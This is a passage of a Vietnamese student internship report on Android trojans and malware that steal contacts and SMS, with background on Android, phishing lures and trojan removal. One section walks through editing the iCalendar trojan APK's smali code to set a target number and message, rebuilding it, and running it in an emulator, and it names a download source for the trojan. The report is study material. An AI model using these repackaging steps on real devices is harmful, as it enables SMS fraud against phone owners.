Baocaothuctapv1Baocaothuctapv1
Baocaothuctapv1
 
baocaonguyenduykhanh
baocaonguyenduykhanhbaocaonguyenduykhanh
baocaonguyenduykhanh
 
Báo cáo thực tập ngành công nghệ thông tin tại công ty Mtech
Báo cáo thực tập ngành công nghệ thông tin tại công ty MtechBáo cáo thực tập ngành công nghệ thông tin tại công ty Mtech
Báo cáo thực tập ngành công nghệ thông tin tại công ty Mtech
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
 

Thực tập

  • 1. 1 ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086 TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP Đề tài: Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng Android và gửi ra ngoài GVHD: Thầy Võ Đỗ Thắng SVTH: Nguyễn Hoàng Đức Lâm MSSV: 1120086 TPHCM, ngày tháng năm 2014
  • 2. Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên và Khoa Điện Tử Viễn thông đã tạo điều kiện cho tôi hoàn thành tốt đợt thực tập này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này. Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa. 2 LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG Một lần nữa tôi xin chân thành cảm ơn. TPHCM, ngày tháng năm 2014 Sinh viên thực tập Nguyễn Hoàng Đức Lâm Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 3. 3 NHẬN XÉT CỦA KHOA ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ TPHCM, ngày ... tháng ... năm 2014 Trưởng Khoa Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 4. Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này. Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa. 4 LỜI CẢM ƠN TRUNG TÂM ATHENA Một lần nữa tôi xin chân thành cảm ơn. TPHCM, ngày tháng năm 2014 Chú thích: Hình Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thực tập (Nguyễn Hoàng Đức Lâm) Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 5. 5 NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ ................................................................................................................................................ TPHCM, ngày ... tháng ... năm 2014 Giảng Viên Hướng Dẫn Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 6.  Những nội dung trong báo cáo này là do tôi thực hiện dưới sự hướng dẫn trực  Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả,  Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi xin 6 LỜI CAM ĐOAN Tôi xin cam đoan: tiếp của thầy Võ Đỗ Thắng. tên công trình, thời gian, địa điểm công bố. chịu hoàn toàn trách nhiệm. TPHCM, ngày tháng năm 2014 Sinh viên thực tập Nguyễn Hoàng Đức Lâm Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 7. Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày càng nóng. Với sự phát triển đến chóng mặt của các nền tảng do động như iOS, Android, Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo, mật thông tin chuyển dần xu hướng từ PC sang mobile đặc biệt là Smartphone. Nếu bạn đang sở hữu một chiếc Smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, Sony,…liệu bạn có dám chắc chắn là “dế cưng” của mình không bị nhiễm các phần mềm gián điệp, nghe lén không?. Vì sao lại như vậy?. Vì theo báo cáo gần đây của các hãng phần mềm bảo mật như Kaspersky Lab, Norton AV, Avast hay BKAV số lượng Smartphone bị nhiễm mã độc ngày càng tang. Đặc biệt hệ điều hành Android là một hệ điều hành phát triển khá nhanh trong những năm gần đây, là một mảnh đất béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả tin, thiêu hiểu biết của người dùng, long tham các thứ “Free” như free app, free wifi đã vô tình tiếp tay cho các Hacker xâm nhập và cài mã độc trên chính chiếc điện thoại của bạn. Đề tài “Ngiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại Android và gửi ra ngoài” sẽ giúp giúp nghiên cứu tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh. 7 LỜI MỞ ĐẦU Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 8. 8 MỤC LỤC LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG ..................................................... 2 NHẬN XÉT CỦA KHOA ............................................................................................... 3 LỜI CẢM ƠN TRUNG TÂM ATHENA .................................................................... 4 NHẬN XÉT CỦA G IẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM................. 5 LỜI CAM ĐOAN ............................................................................................................. 6 LỜI MỞ ĐẦU.................................................................................................................... 7 MỤC LỤC .......................................................................................................................... 8 A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP .............................................. 9 B. THỰC HÀNH................................................................................................... 11 I. Giới thiệu về Hệ Điều Hành Android......................................................................... 11 II. Giới thiệu Trojan và sử dụng Trojan t ấn công máy android .................................. 13 III.Giới thiệu Malware và sử dụng Malware tấn công máy android.........................19 Phân 1: Làm trên mạng Local Lan.................................................................39 Phần 2: Làm trên môi trường VPS ................................................................46 C. KẾT QUẢ ĐẠT ĐƯỢC................................................................................. 62 D. DANH SÁCH CÁC CLIP........................................................................63 E. TRÍCH DẪN NGUỒN THAM KHẢO....................................................64 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 9. - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà.  Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng t heo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…  Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, 9 A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP Cơ sở 1_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. Website: www.athena.edu.vn or www.athena.com.vn Điện thoại: (84-8) 2210 3801 Hotline: 0943 20 00 88 - Lĩnh vực hoạt động: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 10.  Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự…  Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.  Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA. 10 Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… Đội ngũ giảng viên: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 11. Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty. Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động. Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết 11 B.Thực hành I. Giới thiệu về Hệ Điều Hành Android Lịch sử Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 12. bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ. Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android. Đặc đi ểm 1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo 2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. 3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS. 4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android 12 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 13. có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng. II. Giới thiệu Trojan và sử dụng Trojan tấn công máy Trojan - một chương trình dạng virus, một kẻ làm nội gián trong máy tính của bạn đã giúp cho hacker điều khiển máy tính của bạn, Trojan giúp hacker lấy những thông tin quý báu của bạn, thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của bạn nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn trong những chương trình trò chơi, những chương trình mà bạn không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của các chủ thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến các thuê bao cần tấn công thông qua thư điện tử (e-mail) dưới dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này, lập tức Trojan được kích động và tự động sao chép lại tất cả các thông số về mật khẩu của chủ thuê bao. Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm thư điện tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan sẽ bí mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ mà hacker nội đã định sẵn. Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức tinh vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy như thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín để đánh lừa chủ thuê bao bằng chương trình phần mềm thư ma Ghostmail. "tin tặc" dễ dàng thảo ra những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt" chuyê n gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng: "Ðể phòng chống virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài chương trình BKAV 383. Mong quý vị dùng thử Mọi ý kiến đóng góp xin gửi về địa chỉ sau quangnt@it-hut.edu.vn". Khi 13 android. 1. Giới Thiệu Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 14. nhận được những tin kiểu như vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiê n" cho chạy chương trình vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyệ n" hiến mình thành nạn nhân của bọn "tin tặc". Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập Internet thì Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và thậm chí cả cấu hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin tặc. Nhưng nguy hiểm hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy tính của hắn tới máy tính của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông tin... 1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho biết là file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password. 2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy 3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi, password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay passwor d mới. Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin 1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của chương trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn chương trình diệt virus mà thực chất là Trojan. 14 Các thủ đoạn của Hacker mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy. Ðề phòng, tìm và di ệt Trojan? trên mạng. Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau: Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 15. 2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng Internet với từ khóa "Detect and destroy Trojan". Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE Software Microsoft Windows Current Version Run. Nếu thấy có đường dẫn tới một chương trình mà bạn biết là không phải của Window hoặc của các chương trình tiện ích, bạn hãy thoát Window về chế độ DOS và xóa tập tin theo đường dẫn của Registry, vào lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm tra cả tập tin Win.ini, System.ini trong thư mục C:Windows sau mục Run hoặc Load. iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do. 15 2. Hướng dẫn thực hi ện Trojan iCalendar trên Android  Ta mở công cụ supperApk tool, trước đó ta mở 2 máy ảo trước, và công cụ sẽ scan ra.  Sau đó ta vào Project New Project  chọn đến file iCalendar.apk Các bạn có thể tải iCalendar.apk search google hoặc từ trang http://search.4shared-china.com/q/CCAD/1/icalendar%20apk?suggested Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 16.  Sau khi upload xong dữ liệu thì bạn vào ViewView Smail Code để chỉnh sửa code 16  Tiếp tục vào đường dẫn /com/mj/iCalendar.apk Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 17. - File iCalendar.smali , sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin - File SmsReceiver.smali , ta sửa code ở line 41 thành số điện thoại mà máy mình 17 nhắn) và line 253 (là nội dung tin nhắn) muốn gửi đến, giống như ở iCalendar.smali Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 18. Sau khi sửa code ta save lại, và Run > Build (nhấn F5): cho phép bắt đầu quá trình cài đặt trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android khác.Chỉ cần mở iCalendar lên và ấn vài lần (khoảng 7 lần) là đã có một tin nhắn được gửi đi mà không mong muốn. 18 Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 19. III. Giới thiệu Malware (phần mềm độc hại) và sử dụng Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy. - Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. - Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là confirm, check-in. Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào (hầu hết vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể về sau đã 19 Malware tấn công máy android. 1) Giới thiệu Malware: Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. Cơ chế hoạt động của Malware Malware này hoạt động qua hai giai đoạn: Mục đích của Malware Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
  • 20. kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị theo dõi, vì vậy những mối nguy hiểm từ mã độc trên Android đang thực sự đe dọa đến sự an toàn của người dùng hệ điều hành này. Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTr ac k 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyê n 20 2) Giới thiệu hệ điều hành KaLi Linux gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
